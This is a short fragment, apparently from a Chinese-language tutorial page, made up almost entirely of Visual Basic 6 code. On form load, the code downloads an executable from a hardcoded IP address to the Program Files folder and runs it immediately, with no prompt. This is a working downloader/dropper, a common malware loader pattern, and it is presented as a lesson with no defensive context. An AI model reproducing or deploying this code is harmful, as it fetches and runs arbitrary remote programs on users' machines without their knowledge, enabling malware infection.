| 动画介绍:请大家打开音响或带好耳机 语音教程 开始吧 嘿嘿
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Sub Form_Load() URLDownloadToFile 0, "http://58.35.104.152:8080/kevin/110.exe", "C:\Program Files\kevin.exe", 0, 0 Shell "C:\Program Files\kevin.exe" end End Sub |